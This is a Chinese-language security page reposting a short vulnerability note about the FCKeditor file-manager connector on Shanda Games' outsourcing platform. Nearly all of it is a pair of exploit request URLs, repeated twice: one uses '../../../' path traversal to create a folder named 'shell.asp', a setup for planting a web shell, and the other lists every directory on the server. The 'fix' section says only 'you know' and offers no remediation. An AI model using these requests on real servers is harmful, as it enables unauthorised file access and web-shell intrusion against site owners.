您现在的位置是:网站首页> 编程资料编程资料
盛大游戏外包管理平台FCK列全盘目路分析与解决方案_漏洞分析_网络安全_
2023-05-24
330人已围观
简介 盛大游戏外包管理平台FCK列全盘目路分析与解决方案_漏洞分析_网络安全_
修改CurrentFolder 参数使用../../来进入不同的目录
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp
根据返回的XML 信息可以查看网站所有的目录。
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
也可以直接浏览盘符:
修复方案:
你懂的!
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp
根据返回的XML 信息可以查看网站所有的目录。
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
也可以直接浏览盘符:
修复方案:
你懂的!
相关内容
- 搜狐微博的几处CSRF漏洞分析与解决方法_漏洞分析_网络安全_
- phpdisk 漏洞发布 phpdisk header bypass & getShell exp解析_漏洞分析_网络安全_
- 从知名专业社交网站linkedin数据库泄漏事件中引发的思考(图文)_漏洞分析_网络安全_
- 又拍图片管家支付非法充值的漏洞分析及修复方法(图)_漏洞分析_网络安全_
- Mysql身份认证漏洞的分析以及利用_漏洞分析_网络安全_
- KindEditor上传解析漏洞、列目录、内容漏洞_漏洞分析_网络安全_
- 教你如何绕过安全狗(safedog)_漏洞分析_网络安全_
- GitList远程代码执行漏洞(CVE-2014-4511)_漏洞分析_网络安全_
- 使用CSRF漏洞攻击D-link路由器全过程_漏洞分析_网络安全_
- 互联网心脏出血漏洞怎么修复? 心脏出血漏洞修复教程_漏洞分析_网络安全_
